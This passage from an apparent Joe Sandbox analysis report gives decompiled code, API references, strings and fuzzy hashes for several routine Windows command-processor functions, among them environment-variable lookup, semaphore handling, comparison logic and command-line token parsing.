																	__eflags = _t274;
																	if(_t274 == 0) {
																		_t274 =  &_v1632;
																	}
																	_t276 = E001B5712(_t422, _v1660, _t371,  &_v1656, _t416, _v1672, _t274);
																	__eflags = _t276;
																	if(_t276 != 0) {
																		_t279 = _v1112;
																		__eflags = _t279;
																		if(_t279 == 0) {
																			_t279 =  &_v1632;
																		}
																		_t280 = E001D916C(_v1672, _v1660, _v1656, _t279, _t422);
																		__eflags =  *0x1dd560;
																		if( *0x1dd560 != 0) {
																			_t281 = E001C0178(_t280);
																			__eflags = _t281;
																			if(_t281 == 0) {
																				_t405 = _v1112;
																				__eflags = _v1112;
																				if(__eflags == 0) {
																					_t405 =  &_v1632;
																				}
																				_t282 = E001D84FE(_t281, _t405, __eflags, _v1656, _v1660, _v1644);
																				__eflags = _t282 - _t316;
																				if(_t282 == _t316) {
																					E001BCD27(_v1664);
																					E001BDB92(_t422);
																					_t352 = _v1668;
																					goto L129;
																				}
																				_v1672 = _v1668;
																			}
																		}
																		goto L120;
																	}
																}
																__eflags = 0;
																 *0x1dd5cc = 0;
																E001BDB92(_t422);
																_t421 = _v1648;
															} else {
																_push(0);
																_push(0x2340);
																E001BC108(_t367);
															}
														}
														_t416 =  *(_t416 + 0x20);
														__eflags = _t416;
													} while (_t416 != 0);
													_t263 = 0;
													__eflags = 0;
												}
												_t413 = _v1672;
												E001B56AE(_t421, _v1640, _v1672, _t263);
											}
											_t391 = _t421[6];
											_t242 = E001C6A1C(E001C6A00, _t421[6], 0x21, _v1664);
											__eflags = _t242;
											if(_t242 != 0) {
												continue;
											} else {
												E001BCD27(_v1664);
												__imp__??_V@YAXPAX@Z(_v576);
												__imp__??_V@YAXPAX@Z(_v40);
												__imp__??_V@YAXPAX@Z(_v1112);
												_t218 = 0;
											}
										}
									}
									goto L142;
								}
								_t214 = E001BCD27(_v1664);
							}
							goto L141;
						}
					}
				}
				L142:
				_pop(_t414);
				_pop(_t420);
				_pop(_t317);
				return E001C6FD0(_t218, _t317, _v20 ^ _t431, _t391, _t414, _t420);
			}

0x001d85e9
0x001d85e9
0x001d85ec
0x001d85f0
0x001d85f2
0x001d85f4
0x001d85f5
0x001d85fb
0x001d85fb
0x001d85ff
0x001d8607
0x001d8617
0x001d8624
0x001d8629
0x001d8629
0x001d8633
0x001d8649
0x001d8649
0x001d864e
0x001d8654
0x00000000
0x00000000
0x001d8640
0x001d8644
0x001d8644
0x001d865d
0x001d8663
0x001d866c
0x001d8672
0x001d8679
0x001d8681
0x001d8682
0x001d8688
0x001d868d
0x001d868f
0x001d869e
0x001d86a3
0x001d86a4
0x001d86ac
0x001d86af
0x001d86b6
0x001d86be
0x001d86cc
0x001d86d3
0x001d86e4
0x001d86ec
0x001d86fa
0x001d8701
0x001d8712
0x001d871d
0x001d873d
0x001d8e1a
0x001d8e36
0x001d8e3b
0x001d879b
0x001d87a8
0x001d87ad
0x001d87b3
0x00000000
0x001d87b9
0x001d87c0
0x001d87f3
0x00000000
0x001d87c2
0x001d87ce
0x001d87d2
0x001d87d7
0x001d87dd
0x001d87eb
0x001d87ed
0x001d87f7
0x001d87f7
0x001d87f7
0x001d87fb
0x001d87fe
0x001d8802
0x001d8804
0x001d880b
0x00000000
0x00000000
0x001d880d
0x001d8810
0x001d8816
0x00000000
0x001d8818
0x001d8818
0x00000000
0x001d8818
0x00000000
0x001d8816
0x001d881f
0x001d8829
0x001d8833
0x001d8838
0x001d8838
0x001d883f
0x001d8842
0x001d8844
0x001d8849
0x001d8849
0x001d884c
0x001d884c
0x001d884f
0x001d8856
0x00000000
0x00000000
0x001d885c
0x001d8863
0x001d8865
0x001d8867
0x001d8867
0x001d8877
0x001d887c
0x001d887e
0x00000000
0x001d8884
0x001d8884
0x001d888c
0x001d8891
0x001d889a
0x001d889c
0x001d889e
0x001d889e
0x001d88a2
0x001d88b2
0x001d88b7
0x001d88b9
0x00000000
0x001d88bf
0x001d88bf
0x001d88c6
0x001d88c8
0x001d88ca
0x001d88cc
0x001d88cc
0x001d88d2
0x001d88d5
0x001d88db
0x001d88dd
0x001d88df
0x001d88df
0x001d88e6
0x001d88eb
0x001d88ee
0x001d88f0
0x001d8921
0x001d8923
0x001d8926
0x001d8e0a
0x001d8de9
0x001d8deb
0x001d8dec
0x001d8da2
0x001d8da4
0x001d8da6
0x001d8dab
0x001d8daf
0x001d8db6
0x001d8dbb
0x001d8d9d
0x001d8d9d
0x00000000
0x001d8d9d
0x001d892e
0x001d8933
0x001d8935
0x001d8942
0x001d8937
0x001d8937
0x001d893c
0x001d893c
0x001d8946
0x001d894d
0x001d894f
0x001d8951
0x001d8951
0x001d895b
0x001d8968
0x001d896d
0x001d8974
0x001d8978
0x001d8e00
0x001d8df7
0x001d8df7
0x001d8dfc
0x001d8de4
0x001d8de4
0x00000000
0x001d8de4
0x001d897e
0x001d8985
0x001d8987
0x001d8989
0x001d8989
0x001d898e
0x001d8994
0x001d899b
0x001d899d
0x001d89d2
0x001d89d4
0x001d89d6
0x001d89d6
0x001d89e3
0x001d89e5
0x001d89e9
0x001d899f
0x001d899f
0x001d89a1
0x001d89a3
0x001d89a3
0x001d89a7
0x001d89ac
0x001d89b0
0x001d89b4
0x001d89b7
0x001d8df3
0x001d8df3
0x00000000
0x001d8df3
0x001d89be
0x001d89c6
0x001d89cc
0x001d89cc
0x001d89ed
0x001d89f0
0x00000000
0x00000000
0x001d89f6
0x001d89fd
0x001d8a85
0x001d8a85
0x001d8a8f
0x001d8a8f
0x001d8a91
0x00000000
0x00000000
0x001d8a97
0x001d8a9e
0x001d8aa0
0x001d8aa2
0x001d8aa2
0x001d8ab0
0x001d8ab5
0x001d8abc
0x001d8ac0
0x001d8ac2
0x001d8ac7
0x001d8ac9
0x001d8b01
0x001d8acb
0x001d8acb
0x001d8ad2
0x001d8ad4
0x001d8ad6
0x001d8ad6
0x001d8aea
0x001d8aef
0x001d8af1
0x00000000
0x00000000
0x001d8af7
0x001d8afb
0x001d8afb
0x001d8ac9
0x001d8b05
0x001d8b0c
0x001d8b0e
0x001d8b10
0x001d8b10
0x001d8b26
0x001d8b2b
0x001d8b32
0x001d8a8b
0x00000000
0x001d8a8b
0x00000000
0x001d8b32
0x001d8a03
0x001d8a03
0x001d8a08
0x001d8a0a
0x001d8a11
0x001d8a13
0x001d8a15
0x001d8a15
0x001d8a23
0x001d8a28
0x001d8a2f
0x001d8a33
0x001d8a35
0x001d8a3a
0x001d8a3c
0x001d8a74
0x001d8a3e
0x001d8a3e
0x001d8a45
0x001d8a47
0x001d8a49
0x001d8a49
0x001d8a5d
0x001d8a62
0x001d8a64
0x001d8d8d
0x001d8d94
0x001d8d99
0x00000000
0x001d8d99
0x001d8a6a
0x001d8a6e
0x001d8a6e
0x001d8a3c
0x001d8a33
0x001d8a78
0x001d8a7f
0x00000000
0x00000000
0x001d8a7f
0x001d8b38
0x001d8b38
0x001d8b3c
0x001d8b41
0x001d8b46
0x001d88f2
0x001d88fc
0x001d8901
0x001d8905
0x001d8905
0x001d8b4a
0x001d8b4d
0x001d8b4f
0x001d8b54
0x001d8b56
0x001d8b5c
0x001d8b5c
0x001d8b5f
0x001d8b61
0x001d8b66
0x001d8b66
0x001d8b69
0x001d8b69
0x001d8b6c
0x001d8b73
0x001d8b75
0x001d8b77
0x001d8b77
0x001d8b8a
0x001d8b8f
0x001d8b91
0x001d8b9e
0x001d8ba5
0x001d8ba7
0x001d8ba9
0x001d8ba9
0x001d8bb0
0x001d8bb6
0x001d8b93
0x001d8b95
0x001d8b96
0x001d8b97
0x001d8b97
0x001d8bbd
0x001d8bc4
0x001d8bc6
0x001d8bc8
0x001d8bc8
0x001d8bcf
0x001d8bd4
0x001d8bd6
0x001d8bdc
0x001d8be3
0x001d8be5
0x001d8be7
0x001d8be7
0x001d8beb
0x001d8bf2
0x001d8bf4
0x001d8bf6
0x001d8bf6
0x001d8bfd
0x001d8c02
0x001d8c04
0x001d8c1a
0x001d8c21
0x001d8c23
0x001d8c25
0x001d8c25
0x001d8c35
0x001d8c37
0x001d8c3a
0x001d8ddb
0x001d8de0
0x00000000
0x001d8de0
0x001d8c42
0x001d8c47
0x001d8c49
0x001d8cf3
0x001d8cf3
0x001d8c4f
0x001d8c4f
0x001d8c54
0x001d8c54
0x001d8cf7
0x001d8cfe
0x001d8c5d
0x001d8c64
0x001d8c66
0x001d8c68
0x001d8c68
0x001d8c7e
0x001d8c83
0x001d8c85
0x001d8c87
0x001d8c8e
0x001d8c90
0x001d8c92
0x001d8c92
0x001d8ca4
0x001d8ca9
0x001d8cb0
0x001d8cb6
0x001d8cbb
0x001d8cbd
0x001d8cbf
0x001d8cc6
0x001d8cc8
0x001d8cca
0x001d8cca
0x001d8cde
0x001d8ce3
0x001d8ce5
0x001d8dc5
0x001d8dcc
0x001d8dd1
0x00000000
0x001d8dd1
0x001d8cef
0x001d8cef
0x001d8cbd
0x00000000
0x001d8cb0
0x001d8c85
0x001d8d04
0x001d8d08
0x001d8d0d
0x001d8d12
0x001d8c06
0x001d8c08
0x001d8c09
0x001d8c0e
0x001d8c14
0x001d8c04
0x001d8d16
0x001d8d19
0x001d8d19
0x001d8d21
0x001d8d21
0x001d8d21
0x001d8d23
0x001d8d2f
0x001d8d2f
0x001d8d38
0x001d8d42
0x001d8d47
0x001d8d49
0x00000000
0x001d8d4f
0x001d8d53
0x001d8d5f
0x001d8d6d
0x001d8d7b
0x001d8d82
0x001d8d82
0x001d8d49
0x001d88b9
0x00000000
0x001d887e
0x001d8e15
0x001d8e15
0x00000000
0x001d87dd
0x001d87c0
0x001d87b3
0x001d8e3d
0x001d8e44
0x001d8e45
0x001d8e46
0x001d8e51

APIs

longjmp.MSVCRT(001EB8F8,00000001,00000000,001D8DAB,?,?,?,?,00000000,?,00000021,00000000,?,?,?,00000000), ref: 001D865D
memset.MSVCRT ref: 001D86B6
memset.MSVCRT ref: 001D86E4
memset.MSVCRT ref: 001D8712

Part of subcall function 001BCD27: FindClose.API-MS-WIN-CORE-FILE-L1-1-0(?,00000000,001D9362,00000000,00000000,?,001C9814,00000000), ref: 001BCD55

Part of subcall function 001C0C70: ??_V@YAXPAX@Z.MSVCRT ref: 001C0CBA
Part of subcall function 001C0C70: memset.MSVCRT ref: 001C0CDD

Part of subcall function 001B585F: VirtualAlloc.API-MS-WIN-CORE-MEMORY-L1-1-0(00000000,0000FE00,00001000,00000004,00000000,?,00000001,?,001D87AD,?,00000000,-00000105,-00000105,-00000105), ref: 001B5875

Strings

%9d, xrefs: 001D860C

Memory Dump Source

Source File: 0000000E.00000002.519238609.00000000001B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 001B0000, based on PE: true

Associated: 0000000E.00000002.519773087.00000000001F9000.00000040.80000000.00040000.00000000.sdmpDownload File
Associated: 0000000E.00000002.519818892.00000000001FD000.00000040.80000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_1b0000_cmd.jbxd

Similarity

API ID: memset$AllocCloseFindVirtuallongjmp
String ID: %9d
API String ID: 973120493-2241623522
Opcode ID: bd5e233d9943580c38f09cea10d2d4b4233b970b734e17bd73ab42f9bd0a18c0
Instruction ID: 7cfb497dd122bff40bb13a164a6ce529672a3bccd0e642ccc38c6cd64cb62644
Opcode Fuzzy Hash: bd5e233d9943580c38f09cea10d2d4b4233b970b734e17bd73ab42f9bd0a18c0
Instruction Fuzzy Hash: FC51C5B15093809BD324DB79DC85BAB77E9EBA4314F00092EF599D3241EF34D944CB56

Uniqueness

Uniqueness Score: -1.00%

Function 001D2BF0 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 115
COMMON

Download Yara Rule

C-Code - Quality: 88%

			E001D2BF0(void* __ecx, int* _a4) {
				void* _v0;
				signed int _v8;
				short _v528;
				void* _v532;
				int _v536;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t22;
				short* _t25;
				void* _t30;
				void* _t38;
				WCHAR* _t40;
				int* _t41;
				void* _t46;
				void* _t50;
				signed int _t52;
				signed int _t55;
				void* _t57;
				void* _t58;
				signed int _t59;

				_t22 =  *0x1dd0b4; // 0xea614d48
				_v8 = _t22 ^ _t59;
				_t41 = _a4;
				 *_t41 = 0;
				_t41[1] = 0;
				E001C1040( &_v528, 0x104, __ecx);
				_t52 = 0x104;
				_t25 =  &_v528;
				while( *_t25 != 0) {
					_t25 = _t25 + 2;
					_t52 = _t52 - 1;
					if(_t52 != 0) {
						continue;
					}
					break;
				}
				asm("sbb ecx, ecx");
				_t46 =  ~_t52 & 0x00000104 - _t52;
				if(_t52 != 0) {
					_t40 =  &(( &_v528)[_t46]);
					_t58 = 0x104 - _t46;
					if(_t58 == 0) {
						L11:
						_t40 = _t40 - 2;
					} else {
						_t50 = 0x7ffffffe;
						_t52 = L"_p0" - _t40;
						while(_t50 != 0) {
							_t55 =  *(_t40 + _t52) & 0x0000ffff;
							if(_t55 == 0) {
								break;
							} else {
								 *_t40 = _t55;
								_t50 = _t50 - 1;
								_t40 =  &(_t40[1]);
								_t58 = _t58 - 1;
								if(_t58 != 0) {
									continue;
								} else {
									goto L11;
								}
							}
							goto L12;
						}
						if(_t58 == 0) {
							goto L11;
						}
					}
					L12:
					_t46 = 0;
					 *_t40 = 0;
				}
				_t57 = OpenSemaphoreW(0x1f0003, 0,  &_v528);
				_v532 = _t57;
				if(_t57 != 0) {
					_t52 =  &_v536;
					_v536 = 0;
					_t46 = _t57;
					_t30 = E001D213A(_t46, _t52);
					_t54 = _t30;
					if(_t30 >= 0) {
						asm("cdq");
						 *_t41 = _v536;
						_t41[1] = _t52;
						goto L19;
					} else {
						_t46 = _v0;
						_t52 = 0xce;
						E001D292C("wil", _t54);
						_t57 = _v532;
					}
				} else {
					if(GetLastError() == 2) {
						L19:
						_t54 = 0;
					} else {
						_t46 = _v0;
						_t52 = 0xc8;
						_t38 = E001D2913("wil");
						_t57 = _v532;
						_t54 = _t38;
					}
				}
				if(_t57 != 0 && CloseHandle(_t57) == 0) {
					_push(_t46);
					_t52 = 0x879;
					E001D2D56();
				}
				return E001C6FD0(_t54, _t41, _v8 ^ _t59, _t52, _t54, _t57);
			}

0x001d2bfb
0x001d2c02
0x001d2c06
0x001d2c11
0x001d2c19
0x001d2c26
0x001d2c2b
0x001d2c2d
0x001d2c33
0x001d2c39
0x001d2c3c
0x001d2c3f
0x00000000
0x00000000
0x00000000
0x001d2c3f
0x001d2c49
0x001d2c4b
0x001d2c4f
0x001d2c57
0x001d2c5a
0x001d2c5c
0x001d2c8f
0x001d2c8f
0x001d2c5e
0x001d2c63
0x001d2c68
0x001d2c70
0x001d2c74
0x001d2c7b
0x00000000
0x001d2c7d
0x001d2c7d
0x001d2c80
0x001d2c81
0x001d2c84
0x001d2c87
0x00000000
0x001d2c89
0x00000000
0x001d2c89
0x001d2c87
0x00000000
0x001d2c7b
0x001d2c8d
0x00000000
0x00000000
0x001d2c8d
0x001d2c92
0x001d2c92
0x001d2c94
0x001d2c94
0x001d2cab
0x001d2cad
0x001d2cb5
0x001d2cde
0x001d2ce4
0x001d2cee
0x001d2cf0
0x001d2cf5
0x001d2cf9
0x001d2d1c
0x001d2d1d
0x001d2d1f
0x00000000
0x001d2cfb
0x001d2cfb
0x001d2cfe
0x001d2d09
0x001d2d0e
0x001d2d0e
0x001d2cb7
0x001d2cc0
0x001d2d22
0x001d2d22
0x001d2cc2
0x001d2cc2
0x001d2cc5
0x001d2ccf
0x001d2cd4
0x001d2cda
0x001d2cda
0x001d2cc0
0x001d2d26
0x001d2d33
0x001d2d37
0x001d2d3c
0x001d2d3c
0x001d2d53

APIs

OpenSemaphoreW.API-MS-WIN-CORE-SYNCH-L1-1-0(001F0003,00000000,?), ref: 001D2CA5
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 001D2CB7
CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(00000000), ref: 001D2D29

Strings

_p0, xrefs: 001D2C5E
wil, xrefs: 001D2CCA, 001D2D04

Memory Dump Source

Source File: 0000000E.00000002.519238609.00000000001B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 001B0000, based on PE: true

Associated: 0000000E.00000002.519773087.00000000001F9000.00000040.80000000.00040000.00000000.sdmpDownload File
Associated: 0000000E.00000002.519818892.00000000001FD000.00000040.80000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_1b0000_cmd.jbxd

Similarity

API ID: CloseErrorHandleLastOpenSemaphore
String ID: _p0$wil
API String ID: 3419097560-1814513734
Opcode ID: 6e5fa24ecc055d418d5abad2abe9df301a9fdf7c448d1d11a05bda620fd9928c
Instruction ID: 934c88d166871881d7d1961c00e6b0d70cb596545e422c89afd3e57b959a4e75
Opcode Fuzzy Hash: 6e5fa24ecc055d418d5abad2abe9df301a9fdf7c448d1d11a05bda620fd9928c
Instruction Fuzzy Hash: A7413C71A0012987CB35DF24C945BAE77B6EFB1710F1582AAE829DB344DB70CE45C7A0

Uniqueness

Uniqueness Score: -1.00%

Function 001D4588 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 110
COMMON

Download Yara Rule

C-Code - Quality: 74%

			E001D4588(intOrPtr __ecx) {
				intOrPtr _v8;
				intOrPtr* _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				short* _t23;
				intOrPtr _t24;
				intOrPtr _t25;
				intOrPtr* _t33;
				void* _t38;
				intOrPtr _t41;
				void* _t47;
				void* _t49;
				intOrPtr* _t50;
				signed int _t52;
				intOrPtr* _t53;
				intOrPtr* _t54;
				signed int _t55;
				signed int _t56;
				intOrPtr* _t57;
				signed int _t58;
				void* _t59;

				_t33 =  *0x1e3834;
				_v20 = __ecx;
				if(_t33 != 0) {
					_t53 = E001BDF40(E001BDEF9(__ecx));
					_v12 = _t53;
					if(_t53 == 0) {
						L2:
						return 1;
					}
					_t47 = 0x20;
					_t23 = E001C2349(_t53, _t47);
					if(_t23 != 0) {
						 *_t23 = 0;
					}
					_t50 = _t53;
					_v16 = 0;
					_t4 = _t50 + 2; // 0x2
					_t38 = _t4;
					do {
						_t24 =  *_t50;
						_t50 = _t50 + 2;
					} while (_t24 != 0);
					_t54 = _t33;
					_t52 = _t50 - _t38 >> 1;
					_v8 = 1;
					_t41 = _t54 + 2;
					do {
						_t25 =  *_t54;
						_t54 = _t54 + 2;
					} while (_t25 != 0);
					_t55 = _t54 - _t41;
					_t56 = _t55 >> 1;
					if(_t55 == 0) {
						L22:
						E001BC5A2(_t41, 0x400023a9, 1, _v20);
						L23:
						E001C0040(_v12);
						return _v8;
					}
					while( *0x1dd544 == 0) {
						if(_t56 < _t52) {
							L15:
							_t41 = _v8;
							L16:
							_t33 = _t33 + _t56 * 2 + 2;
							_t57 = _t33;
							_t49 = _t57 + 2;
							do {
								_t25 =  *_t57;
								_t57 = _t57 + 2;
							} while (_t25 != _v16);
							_t58 = _t57 - _t49;
							_t56 = _t58 >> 1;
							if(_t58 != 0) {
								continue;
							}
							L21:
							if(_t41 == 0) {
								goto L23;
							}
							goto L22;
						}
						__imp___wcsnicmp(_t33, _v12, _t52);
						_t59 = _t59 + 0xc;
						if(_t25 != 0) {
							goto L15;
						}
						_push(_t33);
						E001C25D9(L"%s\r\n");
						_t41 = 0;
						_v8 = 0;
						goto L16;
					}
					_t41 = _v8;
					goto L21;
				}
				_push("Null environment");
				fprintf(E001C7721(__ecx, 2), "\nCMD Internal Error %s\n");
				goto L2;
			}

0x001d4591
0x001d4599
0x001d45a0
0x001d45d2
0x001d45d4
0x001d45d9
0x001d45be
0x00000000
0x001d45c0
0x001d45dd
0x001d45e0
0x001d45e7
0x001d45eb
0x001d45eb
0x001d45ee
0x001d45f2
0x001d45f5
0x001d45f5
0x001d45f8
0x001d45f8
0x001d45fb
0x001d45fe
0x001d4605
0x001d4609
0x001d460c
0x001d460f
0x001d4612
0x001d4612
0x001d4615
0x001d4618
0x001d461d
0x001d461f
0x001d4621
0x001d4681
0x001d468b
0x001d4693
0x001d4696
0x00000000
0x001d469b
0x001d4623
0x001d462e
0x001d4658
0x001d4658
0x001d465b
0x001d465e
0x001d4661
0x001d4663
0x001d4666
0x001d4666
0x001d4669
0x001d466c
0x001d4672
0x001d4674
0x001d4676
0x00000000
0x00000000
0x001d467d
0x001d467f
0x00000000
0x00000000
0x00000000
0x001d467f
0x001d4635
0x001d463b
0x001d4640
0x00000000
0x00000000
0x001d4642
0x001d4648
0x001d4651
0x001d4653
0x00000000
0x001d4653
0x001d467a
0x00000000
0x001d467a
0x001d45a2
0x001d45b5
0x00000000

APIs

_wcsnicmp.MSVCRT ref: 001D4635

Part of subcall function 001C7721: __iob_func.MSVCRT ref: 001C7726

fprintf.MSVCRT ref: 001D45B5

Strings

%s, xrefs: 001D4643
CMD Internal Error %s, xrefs: 001D45A7
Null environment, xrefs: 001D45A2

Memory Dump Source

Source File: 0000000E.00000002.519238609.00000000001B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 001B0000, based on PE: true

Associated: 0000000E.00000002.519773087.00000000001F9000.00000040.80000000.00040000.00000000.sdmpDownload File
Associated: 0000000E.00000002.519818892.00000000001FD000.00000040.80000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_1b0000_cmd.jbxd

Similarity

API ID: __iob_func_wcsnicmpfprintf
String ID: CMD Internal Error %s$%s$Null environment
API String ID: 1828771275-2781220306
Opcode ID: 039384123db6cd7c60ae4b4cf3c932ed1a326cf280b0bbb1f6595da25c37e3d8
Instruction ID: fddff09b123031aa849a343d22bf291dc31e2a20a0de5351f529cf2931f9ec32
Opcode Fuzzy Hash: 039384123db6cd7c60ae4b4cf3c932ed1a326cf280b0bbb1f6595da25c37e3d8
Instruction Fuzzy Hash: 9531EC36E002159BCB28EF689C45ABEB3A4EB54700F15056EFC1A97780EB709E51C695

Uniqueness

Uniqueness Score: -1.00%

Function 001BAEB0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 77
stringCOMMON

Download Yara Rule

C-Code - Quality: 43%

			E001BAEB0(void* __ecx, intOrPtr _a4) {
				wchar_t* _v8;
				wchar_t* _v12;
				long _t25;
				signed int _t26;
				void* _t28;
				signed int _t30;
				void* _t31;
				void* _t33;
				void* _t34;
				signed int _t36;
				intOrPtr _t45;
				long _t48;
				signed int _t49;

				_t45 = _a4;
				_t48 = wcstol( *(_t45 + 0x38),  &_v8, 0);
				_t25 = wcstol( *(_t45 + 0x3c),  &_v12, 0);
				if( *_v8 != 0 ||  *_v12 != 0) {
					_push( *(_t45 + 0x3c));
					_push( *(_t45 + 0x38));
					if(( *(_t45 + 0x40) & 0x00000002) != 0) {
						_t26 = lstrcmpiW();
					} else {
						_t26 = lstrcmpW();
					}
					_t49 = _t26;
					goto L3;
				} else {
					_t49 = _t48 - _t25;
					L3:
					_t28 =  *((intOrPtr*)(_t45 + 0x44)) - 1;
					if(_t28 == 0) {
						_t30 = 0 | _t49 == 0x00000000;
						L9:
						return _t30;
					}
					_t31 = _t28 - 1;
					if(_t31 == 0) {
						_t30 = 0 | _t49 != 0x00000000;
						goto L9;
					}
					_t33 = _t31 - 1;
					if(_t33 == 0) {
						L14:
						_t30 = _t49 >> 0x1f;
						goto L9;
					}
					_t34 = _t33 - 1;
					if(_t34 == 0) {
						_t30 = 0 | _t49 <= 0x00000000;
						goto L9;
					}
					_t36 = _t34 - 1;
					if(_t36 != 0) {
						if(_t36 != 1) {
							_t30 = 0;
							goto L9;
						}
						_t49 =  !_t49;
						goto L14;
					}
					_t30 = _t36 & 0xffffff00 | _t49 > 0x00000000;
					goto L9;
				}
			}

0x001baeba
0x001baecd
0x001baed7
0x001baee6
0x001baf49
0x001baf4c
0x001baf4f
0x001baf5b
0x001baf51
0x001baf51
0x001baf51
0x001baf57
0x00000000
0x001baef0
0x001baef0
0x001baef2
0x001baef5
0x001baef8
0x001baf20
0x001baf13
0x001baf19
0x001baf19
0x001baefa
0x001baefd
0x001baf29
0x00000000
0x001baf29
0x001baeff
0x001baf02
0x001baf35
0x001baf38
0x00000000
0x001baf38
0x001baf04
0x001baf07
0x001baf40
0x00000000
0x001baf40
0x001baf09
0x001baf0c
0x001baf31
0x001baf63
0x00000000
0x001baf63
0x001baf33
0x00000000
0x001baf33
0x001baf10
0x00000000
0x001baf10

APIs

wcstol.MSVCRT ref: 001BAEC7
wcstol.MSVCRT ref: 001BAED7
lstrcmpW.API-MS-WIN-CORE-STRING-OBSOLETE-L1-1-0(?,?), ref: 001BAF51
lstrcmpiW.API-MS-WIN-CORE-STRING-OBSOLETE-L1-1-0(?,?), ref: 001BAF5B

Strings

iethet, xrefs: 001BAF5B

Memory Dump Source

Source File: 0000000E.00000002.519238609.00000000001B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 001B0000, based on PE: true

Associated: 0000000E.00000002.519773087.00000000001F9000.00000040.80000000.00040000.00000000.sdmpDownload File
Associated: 0000000E.00000002.519818892.00000000001FD000.00000040.80000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_1b0000_cmd.jbxd

Similarity

API ID: wcstol$lstrcmplstrcmpi
String ID: iethet
API String ID: 4273384694-1333794356
Opcode ID: 5c6ad4261bae6ee664ba9ccc8c2c30f68917cbfd2094a613a17da1a72849f390
Instruction ID: ae6f4beb202b4b810ca87149f8bbfea9617cf19c58099356db26d121e09564a0
Opcode Fuzzy Hash: 5c6ad4261bae6ee664ba9ccc8c2c30f68917cbfd2094a613a17da1a72849f390
Instruction Fuzzy Hash: B3113BB2900526BF87656FB9CE0C9FE7BA8FF013507920258EC01D7A50D722ED60D6D2

Uniqueness

Uniqueness Score: -1.00%

Function 001B68D9 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 75
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E001B68D9(void* __ecx, intOrPtr __edx, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v12;
				signed int _t16;
				signed int _t19;
				signed int _t21;
				intOrPtr _t24;
				signed int _t38;
				long _t40;
				signed short* _t44;

				_push(__ecx);
				_push(__ecx);
				_v12 = __edx;
				_t44 = E001BDEF9(__ecx);
				_t16 =  *_t44 & 0x0000ffff;
				if(_t16 != 0x3a) {
					if(_t16 != 0x2b) {
						goto L2;
					} else {
						goto L1;
					}
					L10:
					_t19 = _v8;
					 *((short*)(_v12 + _t19 * 2)) = 0;
					return _t19;
					L17:
				} else {
					L1:
					_t44 =  &(_t44[1]);
				}
				L2:
				_t24 = _a8;
				if(_t24 == 0) {
					_t44 = E001BDEF9(_t44);
				}
				_v8 = _v8 & 0x00000000;
				_t40 =  *_t44 & 0x0000ffff;
				while(_t24 == 0 || wcschr(L"=,;", _t40) == 0) {
					if(wcschr(L"+:\n\r\t ", _t40) == 0) {
						if(_t24 == 0) {
							if(E001BD7D4(L"&<|>", _t40) == 0) {
								if(_t40 != 0x5e) {
									goto L8;
								} else {
									_t44 =  &(_t44[1]);
									_t38 =  *_t44 & 0x0000ffff;
									goto L9;
								}
								goto L17;
							}
						} else {
							L8:
							_t38 = _t40 & 0x0000ffff;
							L9:
							_t32 = _v8;
							_t44 =  &(_t44[1]);
							_t7 = _t32 + 1; // 0x1
							_t21 = _t7;
							 *(_v12 + _v8 * 2) = _t38;
							_t40 =  *_t44 & 0x0000ffff;
							_v8 = _t21;
							if(_t21 < 0x7f) {
								continue;
							}
						}
					}
					goto L10;
				}
				goto L10;
			}

0x001b68de
0x001b68df
0x001b68e3
0x001b68eb
0x001b68ed
0x001b68f3
0x001b6970
0x00000000
0x001b6972
0x00000000
0x001b6972
0x001b6958
0x001b6958
0x001b6963
0x001b696a
0x00000000
0x001b68f5
0x001b68f5
0x001b68f5
0x001b68f5
0x001b68f8
0x001b68f8
0x001b68fd
0x001cbe67
0x001cbe67
0x001b6903
0x001b6907
0x001b690a
0x001b6930
0x001b6934
0x001cbe7c
0x001cbe86
0x00000000
0x001cbe8c
0x001cbe8c
0x001cbe8f
0x00000000
0x001cbe8f
0x00000000
0x001cbe86
0x001b693a
0x001b693a
0x001b693a
0x001b693d
0x001b693d
0x001b6940
0x001b6946
0x001b6946
0x001b6949
0x001b694d
0x001b6950
0x001b6956
0x00000000
0x00000000
0x001b6956
0x001b6934
0x00000000
0x001b6930
0x00000000

APIs

Part of subcall function 001BDEF9: iswspace.MSVCRT ref: 001BDF07
Part of subcall function 001BDEF9: wcschr.MSVCRT ref: 001BDF18

wcschr.MSVCRT ref: 001B6914
wcschr.MSVCRT ref: 001B6926

Strings

&<|>, xrefs: 001CBE70
+: , xrefs: 001B6921
=,;, xrefs: 001B690F

Memory Dump Source

Source File: 0000000E.00000002.519238609.00000000001B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 001B0000, based on PE: true

Associated: 0000000E.00000002.519773087.00000000001F9000.00000040.80000000.00040000.00000000.sdmpDownload File
Associated: 0000000E.00000002.519818892.00000000001FD000.00000040.80000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_1b0000_cmd.jbxd

Similarity

API ID: wcschr$iswspace
String ID: &<|>$+: $=,;
API String ID: 3458554142-2256444845
Opcode ID: 056c12bf21a0830309190d7688a3a8ea02601322bdbb829ff843bf79765a8fe8
Instruction ID: bdc98def31e1de57c2c9c72725817497ae8f735f4faad4df8e55c6d86813891f
Opcode Fuzzy Hash: 056c12bf21a0830309190d7688a3a8ea02601322bdbb829ff843bf79765a8fe8
Instruction Fuzzy Hash: 77213A62A04265EEC7389B26D4556FEB7E5EFB5718B25006AF9C4D7280F7394C40D350

Uniqueness

Uniqueness Score: -1.00%

